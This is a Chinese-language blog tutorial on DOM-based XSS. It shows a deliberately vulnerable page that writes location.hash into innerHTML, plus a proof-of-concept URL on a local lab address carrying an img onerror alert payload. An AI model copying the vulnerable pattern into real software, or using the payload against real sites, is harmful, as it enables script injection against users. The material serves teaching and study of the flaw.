DOM XSS详解
2024-10-10 08:36:29
DOM XSS简介
DOM XSS与反射性XSS、存储型XSS的主要区别在于DOM XSS的XSS代码不需要服务端解析响应的直接参与,触发XSS的是浏览器端的DOM解析。
DOM XSS复现
环境搭建
<html>
<head>
<title>DOM XSS</title>
<meta charset="utf-8">
</head>
<body>
<div id="area"></div>
<script>
document.getElementById("area").innerHTML = unescape(location.hash); //location.hash函数要从uri中的#
</script>
</body>
</html>
漏洞复现
http://192.168.2.147/DOMxss.html#<img src=x onerror='alert(/xss/)'>
代码的服务端未作任何操作,而客户端的JavaScript代码动态地将location.hash赋给document.getElementById("area").innerHTML,导致DOM XSS
流量分析
跨站攻击的流量没有经过服务端
声明
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !
最新文章
- svn 图标不显示
- python,django安装
- [HIHO1052]基因工程(找规律)
- 重新想象 Windows 8 Store Apps (69) - 其它: 自定义启动屏幕, 程序的运行位置, 保持屏幕的点亮状态, MessageDialog, PopupMenu
- iOS “获取验证码”按钮的倒计时功能
- linux 主机免验证登录
- 【原创】tcp协议那块一些点(想到了再加)
- JNI总结(一)
- DLNA_百度百科
- Virtualbox之Ubuntu虚拟机网络访问设置
- 企业Nginx+Keepalived双主架构案例实战
- winform编程设定listview选中行
- Visual Studio 2019 正式发布,重磅更新,支持live share
- 【RL-TCPnet网络教程】第5章 PHY芯片和STM32的MAC基础知识
- (转)http authorization 基本认证
- C# 数据为空,不能对NULL调用此方法或属性的解决办法
- C#遍历SharePoint文档库下所有文档包括文档库中子文件夹下所有文档
- 更改MAC地址,突破公司绑定MAC地址的限制
- Windows jdk安装以及版本切换
- BZOJ 4584 【APIO2016】 赛艇
热门文章
- 第一章 数据库管理员(DBA)
- MySQL死锁系列-线上死锁问题排查思路
- day71:drf:API接口&;Restful API规范&;Django Rest Framework&;drf中的序列化和反序列化功能
- Linux文件系统和管理-2文件操作命令(下)
- readcf: option RunAsUser: unknown user smmsp发送邮件失败问题
- Idea启动报错 Error:java: System Java Compiler was not found in classpath
- win32之临界区
- pandas dataframe 时间字段 diff 函数
- 在 k8S 中搭建 SonarQube 7.4.9 版本(使用 PostgreSQL 数据库)
- 使用 tabindex 配合 focus-within 巧妙实现父选择器